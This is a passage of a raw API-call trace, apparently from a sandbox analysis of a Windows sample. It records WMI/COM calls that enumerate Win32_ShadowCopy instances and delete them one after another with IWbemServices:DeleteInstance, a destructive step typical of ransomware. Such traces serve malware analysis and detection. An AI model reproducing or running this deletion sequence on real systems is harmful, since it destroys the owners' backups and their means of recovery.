puBuffLength=0x1c64d800*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0x1c64d800*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0 [0126.931] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x1c8e1390, puCount=0x1c64d2a0 | out: puCount=0x1c64d2a0*=0x2) returned 0x0 [0126.931] WbemDefPath:IWbemPath:GetText (in: This=0x1c8e1390, lFlags=4, puBuffLength=0x1c64d2a0*=0x0, pszText=0x0 | out: puBuffLength=0x1c64d2a0*=0x17, pszText=0x0) returned 0x0 [0126.931] WbemDefPath:IWbemPath:GetText (in: This=0x1c8e1390, lFlags=4, puBuffLength=0x1c64d2a0*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0x1c64d2a0*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0 [0126.931] IWbemClassObject:Get (in: This=0x1c908420, wszName="__NAMESPACE", lFlags=0, pVal=0x1c64d290*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c64d28c*=0, plFlavor=0x1c64d288*=0 | out: pVal=0x1c64d290*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="root\\cimv2", varVal2=0x0), pType=0x1c64d28c*=8, plFlavor=0x1c64d288*=64) returned 0x0 [0126.931] SysStringLen (param_1="root\\cimv2") returned 0xa [0126.931] IWbemClassObject:Get (in: This=0x1c908420, wszName="__NAMESPACE", lFlags=0, pVal=0x1c64d2a0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c64d29c*=8, plFlavor=0x1c64d298*=64 | out: pVal=0x1c64d2a0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="root\\cimv2", varVal2=0x0), pType=0x1c64d29c*=8, plFlavor=0x1c64d298*=64) returned 0x0 [0126.931] SysStringLen (param_1="root\\cimv2") returned 0xa [0126.931] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x1c8e1390, puCount=0x1c64d2a0 | out: puCount=0x1c64d2a0*=0x2) returned 0x0 [0126.931] WbemDefPath:IWbemPath:GetText (in: This=0x1c8e1390, lFlags=4, puBuffLength=0x1c64d2a0*=0x0, pszText=0x0 | out: puBuffLength=0x1c64d2a0*=0x17, pszText=0x0) returned 0x0 [0126.931] WbemDefPath:IWbemPath:GetText (in: This=0x1c8e1390, lFlags=4, puBuffLength=0x1c64d2a0*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0x1c64d2a0*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0 [0126.931] IWbemClassObject:Get (in: This=0x1c908420, wszName="__CLASS", lFlags=0, pVal=0x1c64d290*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c64d28c*=0, plFlavor=0x1c64d288*=0 | out: pVal=0x1c64d290*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Win32_ShadowCopy", varVal2=0x0), pType=0x1c64d28c*=8, plFlavor=0x1c64d288*=64) returned 0x0 [0126.932] SysStringLen (param_1="Win32_ShadowCopy") returned 0x10 [0126.932] IWbemClassObject:Get (in: This=0x1c908420, wszName="__CLASS", lFlags=0, pVal=0x1c64d2a0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c64d29c*=8, plFlavor=0x1c64d298*=64 | out: pVal=0x1c64d2a0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Win32_ShadowCopy", varVal2=0x0), pType=0x1c64d29c*=8, plFlavor=0x1c64d298*=64) returned 0x0 [0126.932] SysStringLen (param_1="Win32_ShadowCopy") returned 0x10 [0126.934] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x1c9030d0, puCount=0x1c64cfa0 | out: puCount=0x1c64cfa0*=0x2) returned 0x0 [0126.934] WbemDefPath:IWbemPath:GetText (in: This=0x1c9030d0, lFlags=4, puBuffLength=0x1c64cfa0*=0x0, pszText=0x0 | out: puBuffLength=0x1c64cfa0*=0x54, pszText=0x0) returned 0x0 [0126.934] WbemDefPath:IWbemPath:GetText (in: This=0x1c9030d0, lFlags=4, puBuffLength=0x1c64cfa0*=0x54, pszText="00000000000000000000000000000000000000000000000000000000000000000000000000000000000" | out: puBuffLength=0x1c64cfa0*=0x54, pszText="\\\\XDUWTFONO\\root\\cimv2:Win32_ShadowCopy.ID=\"{4F7A47EB-6D55-4A21-A8E3-D86C5E1F886F}\"") returned 0x0 [0126.934] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x1c8e1390, puCount=0x1c64cef0 | out: puCount=0x1c64cef0*=0x2) returned 0x0 [0126.934] WbemDefPath:IWbemPath:GetText (in: This=0x1c8e1390, lFlags=4, puBuffLength=0x1c64cef0*=0x0, pszText=0x0 | out: puBuffLength=0x1c64cef0*=0x17, pszText=0x0) returned 0x0 [0126.934] WbemDefPath:IWbemPath:GetText (in: This=0x1c8e1390, lFlags=4, puBuffLength=0x1c64cef0*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0x1c64cef0*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0 [0126.934] CoGetContextToken (in: pToken=0x1c64cd80 | out: pToken=0x1c64cd80) returned 0x0 [0126.934] WbemLocator:IUnknown:AddRef (This=0x1b797ce0) returned 0x3 [0126.934] WbemLocator:IUnknown:QueryInterface (in: This=0x1b797ce0, riid=0x7fef2a9d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c64c950 | out: ppvObject=0x1c64c950*=0x1b797ce0) returned 0x0 [0126.935] WbemLocator:IUnknown:Release (This=0x1b797ce0) returned 0x3 [0126.935] WbemLocator:IUnknown:Release (This=0x1b797ce0) returned 0x2 [0126.935] IWbemClassObject:Get (in: This=0x1c908420, wszName="__GENUS", lFlags=0, pVal=0x1c64cee0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c64cedc*=0, plFlavor=0x1c64ced8*=0 | out: pVal=0x1c64cee0*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), pType=0x1c64cedc*=3, plFlavor=0x1c64ced8*=64) returned 0x0 [0126.935] WbemDefPath:IWbemPath:GetText (in: This=0x1c9030d0, lFlags=2, puBuffLength=0x1c64cfb0*=0x0, pszText=0x0 | out: puBuffLength=0x1c64cfb0*=0x3d, pszText=0x0) returned 0x0 [0126.935] WbemDefPath:IWbemPath:GetText (in: This=0x1c9030d0, lFlags=2, puBuffLength=0x1c64cfb0*=0x3d, pszText="000000000000000000000000000000000000000000000000000000000000" | out: puBuffLength=0x1c64cfb0*=0x3d, pszText="Win32_ShadowCopy.ID=\"{4F7A47EB-6D55-4A21-A8E3-D86C5E1F886F}\"") returned 0x0 [0126.935] IWbemServices:DeleteInstance (in: This=0x1c8f44f8, strObjectPath="Win32_ShadowCopy.ID=\"{4F7A47EB-6D55-4A21-A8E3-D86C5E1F886F}\"", lFlags=0, pCtx=0x0, ppCallResult=0x0 | out: ppCallResult=0x0) returned 0x0 [0127.695] CoTaskMemAlloc (cb=0x8) returned 0x1b77f8d0 [0127.695] IEnumWbemClassObject:Next (in: This=0x1c8f4788, lTimeout=-1, uCount=0x1, apObjects=0x1b77f8d0, puReturned=0x1c64d8b8 | out: apObjects=0x1b77f8d0*=0x1c909a70, puReturned=0x1c64d8b8*=0x1) returned 0x0 [0127.696] IUnknown:QueryInterface (in: This=0x1c909a70, riid=0x7fef2a9d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c64cbe0 | out: ppvObject=0x1c64cbe0*=0x1c909a70) returned 0x0 [0127.696] IUnknown:QueryInterface (in: This=0x1c909a70, riid=0x7fef2a9d850*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x1c64cc60 | out: ppvObject=0x1c64cc60*=0x0) returned 0x80004002 [0127.697] IUnknown:QueryInterface (in: This=0x1c909a70, riid=0x7fef2a9d2c0*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x1c64c9f8 | out: ppvObject=0x1c64c9f8*=0x0) returned 0x80004002 [0127.697] IUnknown:AddRef (This=0x1c909a70) returned 0x3 [0127.697] CoGetContextToken (in: pToken=0x1c64c8b0 | out: pToken=0x1c64c8b0) returned 0x0 [0127.697] IUnknown:QueryInterface (in: This=0x1c909a70, riid=0x7fef2a9d2b0*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c64c870 | out: ppvObject=0x1c64c870*=0x1c909a78) returned 0x0 [0127.697] IMarshal:GetUnmarshalClass (in: This=0x1c909a78, riid=0x7fef2a9d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x1c64c8a0 | out: pCid=0x1c64c8a0*(Data1=0x4590f812, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24))) returned 0x0 [0127.697] IUnknown:Release (This=0x1c909a78) returned 0x3 [0127.697] CoGetContextToken (in: pToken=0x1c64c880 | out: pToken=0x1c64c880) returned 0x0 [0127.697] IUnknown:AddRef (This=0x1c909a70) returned 0x4 [0127.697] IUnknown:QueryInterface (in: This=0x1c909a70, riid=0x7fef2a9d280*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c64c998 | out: ppvObject=0x1c64c998*=0x0) returned 0x80004002 [0127.698] IUnknown:Release (This=0x1c909a70) returned 0x3 [0127.698] IUnknown:Release (This=0x1c909a70) returned 0x2 [0127.698] CoGetContextToken (in: pToken=0x1c64cd40 | out: pToken=0x1c64cd40) returned 0x0 [0127.698] CoGetContextToken (in: pToken=0x1c64cc80 | out: pToken=0x1c64cc80) returned 0x0 [0127.698] IUnknown:AddRef (This=0x1c909a70) returned 0x3 [0127.698] IUnknown:QueryInterface (in: This=0x1c909a70, riid=0x1c64cdc0*(Data1=0xdc12a681, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x1c64cda0 | out: ppvObject=0x1c64cda0*=0x1c909a70) returned 0x0 [0127.698] IUnknown:Release (This=0x1c909a70) returned 0x3 [0127.698] IUnknown:Release (This=0x1c909a70) returned 0x2 [0127.698] IUnknown:Release (This=0x1c909a70) returned 0x1 [0127.698] CoTaskMemFree (pv=0x1b77f8d0) [0127.698] CoGetContextToken (in: pToken=0x1c64d6c0 | out: pToken=0x1c64d6c0) returned 0x0 [0127.698] IUnknown:AddRef (This=0x1c909a70) returned 0x2 [0127.699] IWbemClassObject:Get (in: This=0x1c909a70, wszName="__GENUS", lFlags=0, pVal=0x1c64d830*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c64d82c*=0, plFlavor=0x1c64d828*=0 | out: pVal=0x1c64d830*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), pType=0x1c64d82c*=3, plFlavor=0x1c64d828*=64) returned 0x0 [0127.699] IWbemClassObject:Get (in: This=0x1c909a70, wszName="__PATH", lFlags=0, pVal=0x1c64d7d0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c64d7cc*=0, plFlavor=0x1c64d7c8*=0 | out: pVal=0x1c64d7d0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="\\\\XDUWTFONO\\root\\cimv2:Win32_ShadowCopy.ID=\"{1AADC94C-D98B-4E59-91DD-8E2EFE01CFB1}\"", varVal2=0x0), pType=0x1c64d7cc*=8, plFlavor=0x1c64d7c8*=64) returned 0x0 [0127.699] SysStringLen (param_1="\\\\XDUWTFONO\\root\\cimv2:Win32_ShadowCopy.ID=\"{1AADC94C-D98B-4E59-91DD-8E2EFE01CFB1}\"") returned 0x53 [0127.699] CoGetObjectContext (in: riid=0x1c64d768*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x1c64d760 | out: ppv=0x1c64d760*=0x212498) returned 0x0 [0127.699] IComThreadingInfo:GetCurrentApartmentType (in: This=0x212498, pAptType=0x1c64d780 | out: pAptType=0x1c64d780*=1) returned 0x0 [0127.699] IUnknown:QueryInterface (in: This=0x212498, riid=0x359dd40*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x1c64d888 | out: ppvObject=0x1c64d888*=0x0) returned 0x80004002 [0127.699] IUnknown:Release (This=0x212498) returned 0x1 [0127.700] CoGetClassObject (in: rclsid=0x1b7738e8*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef2a9d250*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x1c64cdf0 | out: ppv=0x1c64cdf0*=0x1c9023a0) returned 0x0 [0127.700] WbemDefPath:IUnknown:QueryInterface (in: This=0x1c9023a0, riid=0x7fef2a9d2d0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x1c64cb00 | out: ppvObject=0x1c64cb00*=0x0) returned 0x80004002 [0127.700] WbemDefPath:IClassFactory:CreateInstance (in: This=0x1c9023a0, pUnkOuter=0x0, riid=0x7fef2a9d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c64cae8 | out: ppvObject=0x1c64cae8*=0x1c903190) returned 0x0 [0127.700] WbemDefPath:IUnknown:QueryInterface (in: This=0x1c903190, riid=0x7fef2a9d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c64c9f0 | out: ppvObject=0x1c64c9f0*=0x1c903190) returned 0x0 [0127.700] WbemDefPath:IUnknown:QueryInterface (in: This=0x1c903190, riid=0x7fef2a9d850*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x1c64ca70 | out: ppvObject=0x1c64ca70*=0x0) returned 0x80004002 [0127.701] WbemDefPath:IUnknown:AddRef (This=0x1c903190) returned 0x3 [0127.701] CoGetContextToken (in: pToken=0x1c64c6c0 | out: pToken=0x1c64c6c0) returned 0x0 [0127.701] WbemDefPath:IUnknown:QueryInterface (in: This=0x1c903190, riid=0x7fef2a9d2b0*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c64c680 | out: ppvObject=0x1c64c680*=0x1b7933b0) returned 0x0 [0127.701] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x1b7933b0, riid=0x7fef2a9d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x1c64c6b0 | out: pCid=0x1c64c6b0*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0127.701] WbemDefPath:IUnknown:Release (This=0x1b7933b0) returned 0x3 [0127.701] CoGetContextToken (in: pToken=0x1c64c690 | out: pToken=0x1c64c690) returned 0x0 [0127.701] WbemDefPath:IUnknown:AddRef (This=0x1c903190) returned 0x4 [0127.701] WbemDefPath:IUnknown:QueryInterface (in: This=0x1c903190, riid=0x7fef2a9d280*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c64c7a8 | out: ppvObject=0x1c64c7a8*=0x0) returned 0x80004002 [0127.701] WbemDefPath:IUnknown:Release (This=0x1c903190) returned 0x3 [0127.702] WbemDefPath:IUnknown:Release (This=0x1c903190) returned 0x2 [0127.702] WbemDefPath:IUnknown:Release (This=0x1c9023a0) returned 0x0 [0127.702] WbemDefPath:IUnknown:Release (This=0x1c903190) returned 0x1 [0127.702] CoGetContextToken (in: pToken=0x1c64d3c0 | out: pToken=0x1c64d3c0) returned 0x0 [0127.702] CoGetContextToken (in: pToken=0x1c64d300 | out: pToken=0x1c64d300) returned 0x0 [0127.702] WbemDefPath:IUnknown:AddRef (This=0x1c903190) returned 0x2 [0127.702] WbemDefPath:IUnknown:QueryInterface (in: This=0x1c903190, riid=0x1c64d440*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x1c64d420 | out: ppvObject=0x1c64d420*=0x1c903190) returned 0x0 [0127.702] WbemDefPath:IUnknown:Release (This=0x1c903190) returned 0x2 [0127.702] WbemDefPath:IUnknown:Release (This=0x1c903190) returned 0x1 [0127.702] CoGetContextToken (in: pToken=0x1c64d540 | out: pToken=0x1c64d540) returned 0x0 [0127.702] CoGetContextToken (in: pToken=0x1c64d480 | out: pToken=0x1c64d480) returned 0x0 [0127.702] WbemDefPath:IUnknown:AddRef (This=0x1c903190) returned 0x2 [0127.702] WbemDefPath:IUnknown:QueryInterface (in: This=0x1c903190, riid=0x1c64d5c0*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x1c64d5a0 | out: ppvObject=0x1c64d5a0*=0x1c903190) returned 0x0 [0127.703] WbemDefPath:IUnknown:Release (This=0x1c903190) returned 0x2 [0127.703] WbemDefPath:IUnknown:AddRef (This=0x1c903190) returned 0x3 [0127.703] WbemDefPath:IWbemPath:SetText (This=0x1c903190, uMode=0x4, pszPath="\\\\XDUWTFONO\\root\\cimv2:Win32_ShadowCopy.ID=\"{1AADC94C-D98B-4E59-91DD-8E2EFE01CFB1}\"") returned 0x0 [0127.703] WbemDefPath:IUnknown:Release (This=0x1c903190) returned 0x2 [0127.703] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x1c8e1390, puCount=0x1c64d800 | out: puCount=0x1c64d800*=0x2) returned 0x0 [0127.703] WbemDefPath:IWbemPath:GetText (in: This=0x1c8e1390, lFlags=4, puBuffLength=0x1c64d800*=0x0, pszText=0x0 | out: puBuffLength=0x1c64d800*=0x17, pszText=0x0) returned 0x0 [0127.703] WbemDefPath:IWbemPath:GetText (in: This=0x1c8e1390, lFlags=4, puBuffLength=0x1c64d800*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0x1c64d800*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0 [0127.704] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x1c8e1390, puCount=0x1c64d2a0 | out: puCount=0x1c64d2a0*=0x2) returned 0x0 [0127.704] WbemDefPath:IWbemPath:GetText (in: This=0x1c8e1390, lFlags=4, puBuffLength=0x1c64d2a0*=0x0, pszText=0x0 | out: puBuffLength=0x1c64d2a0*=0x17, pszText=0x0) returned 0x0 [0127.704] WbemDefPath:IWbemPath:GetText (in: This=0x1c8e1390, lFlags=4, puBuffLength=0x1c64d2a0*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0x1c64d2a0*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0 [0127.704] IWbemClassObject:Get (in: This=0x1c909a70, wszName="__NAMESPACE", lFlags=0, pVal=0x1c64d290*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c64d28c*=0, plFlavor=0x1c64d288*=0 | out: pVal=0x1c64d290*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="root\\cimv2", varVal2=0x0), pType=0x1c64d28c*=8, plFlavor=0x1c64d288*=64) returned 0x0 [0127.704] SysStringLen (param_1="root\\cimv2") returned 0xa [0127.704] IWbemClassObject:Get (in: This=0x1c909a70, wszName="__NAMESPACE", lFlags=0, pVal=0x1c64d2a0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c64d29c*=8, plFlavor=0x1c64d298*=64 | out: pVal=0x1c64d2a0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="root\\cimv2", varVal2=0x0), pType=0x1c64d29c*=8, plFlavor=0x1c64d298*=64) returned 0x0 [0127.704] SysStringLen (param_1="root\\cimv2") returned 0xa [0127.704] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x1c8e1390, puCount=0x1c64d2a0 | out: puCount=0x1c64d2a0*=0x2) returned 0x0 [0127.704] WbemDefPath:IWbemPath:GetText (in: This=0x1c8e1390, lFlags=4, puBuffLength=0x1c64d2a0*=0x0, pszText=0x0 | out: puBuffLength=0x1c64d2a0*=0x17, pszText=0x0) returned 0x0 [0127.704] WbemDefPath:IWbemPath:GetText (in: This=0x1c8e1390, lFlags=4, puBuffLength=0x1c64d2a0*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0x1c64d2a0*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0 [0127.704] IWbemClassObject:Get (in: This=0x1c909a70, wszName="__CLASS", lFlags=0, pVal=0x1c64d290*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c64d28c*=0, plFlavor=0x1c64d288*=0 | out: pVal=0x1c64d290*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Win32_ShadowCopy", varVal2=0x0), pType=0x1c64d28c*=8, plFlavor=0x1c64d288*=64) returned 0x0 [0127.704] SysStringLen (param_1="Win32_ShadowCopy") returned 0x10 [0127.704] IWbemClassObject:Get (in: This=0x1c909a70, wszName="__CLASS", lFlags=0, pVal=0x1c64d2a0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c64d29c*=8, plFlavor=0x1c64d298*=64 | out: pVal=0x1c64d2a0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Win32_ShadowCopy", varVal2=0x0), pType=0x1c64d29c*=8, plFlavor=0x1c64d298*=64) returned 0x0 [0127.704] SysStringLen (param_1="Win32_ShadowCopy") returned 0x10 [0127.707] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x1c903190, puCount=0x1c64cfa0 | out: puCount=0x1c64cfa0*=0x2) returned 0x0 [0127.707] WbemDefPath:IWbemPath:GetText (in: This=0x1c903190, lFlags=4, puBuffLength=0x1c64cfa0*=0x0, pszText=0x0 | out: puBuffLength=0x1c64cfa0*=0x54, pszText=0x0) returned 0x0 [0127.707] WbemDefPath:IWbemPath:GetText (in: This=0x1c903190, lFlags=4, puBuffLength=0x1c64cfa0*=0x54, pszText="00000000000000000000000000000000000000000000000000000000000000000000000000000000000" | out: puBuffLength=0x1c64cfa0*=0x54, pszText="\\\\XDUWTFONO\\root\\cimv2:Win32_ShadowCopy.ID=\"{1AADC94C-D98B-4E59-91DD-8E2EFE01CFB1}\"") returned 0x0 [0127.707] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x1c8e1390, puCount=0x1c64cef0 | out: puCount=0x1c64cef0*=0x2) returned 0x0 [0127.707] WbemDefPath:IWbemPath:GetText (in: This=0x1c8e1390, lFlags=4, puBuffLength=0x1c64cef0*=0x0, pszText=0x0 | out: puBuffLength=0x1c64cef0*=0x17, pszText=0x0) returned 0x0 [0127.707] WbemDefPath:IWbemPath:GetText (in: This=0x1c8e1390, lFlags=4, puBuffLength=0x1c64cef0*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0x1c64cef0*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0 [0127.707] CoGetContextToken (in: pToken=0x1c64cd80 | out: pToken=0x1c64cd80) returned 0x0 [0127.707] WbemLocator:IUnknown:AddRef (This=0x1b797ce0) returned 0x3 [0127.707] WbemLocator:IUnknown:QueryInterface (in: This=0x1b797ce0, riid=0x7fef2a9d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c64c950 | out: ppvObject=0x1c64c950*=0x1b797ce0) returned 0x0 [0127.707] WbemLocator:IUnknown:Release (This=0x1b797ce0) returned 0x3 [0127.708] WbemLocator:IUnknown:Release (This=0x1b797ce0) returned 0x2 [0127.708] IWbemClassObject:Get (in: This=0x1c909a70, wszName="__GENUS", lFlags=0, pVal=0x1c64cee0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c64cedc*=0, plFlavor=0x1c64ced8*=0 | out: pVal=0x1c64cee0*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), pType=0x1c64cedc*=3, plFlavor=0x1c64ced8*=64) returned 0x0 [0127.708] WbemDefPath:IWbemPath:GetText (in: This=0x1c903190, lFlags=2, puBuffLength=0x1c64cfb0*=0x0, pszText=0x0 | out: puBuffLength=0x1c64cfb0*=0x3d, pszText=0x0) returned 0x0 [0127.708] WbemDefPath:IWbemPath:GetText (in: This=0x1c903190, lFlags=2, puBuffLength=0x1c64cfb0*=0x3d, pszText="000000000000000000000000000000000000000000000000000000000000" | out: puBuffLength=0x1c64cfb0*=0x3d, pszText="Win32_ShadowCopy.ID=\"{1AADC94C-D98B-4E59-91DD-8E2EFE01CFB1}\"") returned 0x0 [0127.708] IWbemServices:DeleteInstance (in: This=0x1c8f44f8, strObjectPath="Win32_ShadowCopy.ID=\"{1AADC94C-D98B-4E59-91DD-8E2EFE01CFB1}\"", lFlags=0, pCtx=0x0, ppCallResult=0x0 | out: ppCallResult=0x0) returned 0x0 [0128.564] CoTaskMemAlloc (cb=0x8) returned 0x1b77f8d0 [0128.564] IEnumWbemClassObject:Next (in: This=0x1c8f4788, lTimeout=-1, uCount=0x1, apObjects=0x1b77f8d0, puReturned=0x1c64d8b8 | out: apObjects=0x1b77f8d0*=0x1c90a8c0, puReturned=0x1c64d8b8*=0x1) returned 0x0 [0128.565] IUnknown:QueryInterface (in: This=0x1c90a8c0, riid=0x7fef2a9d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c64cbe0 | out: ppvObject=0x1c64cbe0*=0x1c90a8c0) returned 0x0 [0128.565] IUnknown:QueryInterface (in: This=0x1c90a8c0, riid=0x7fef2a9d850*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), 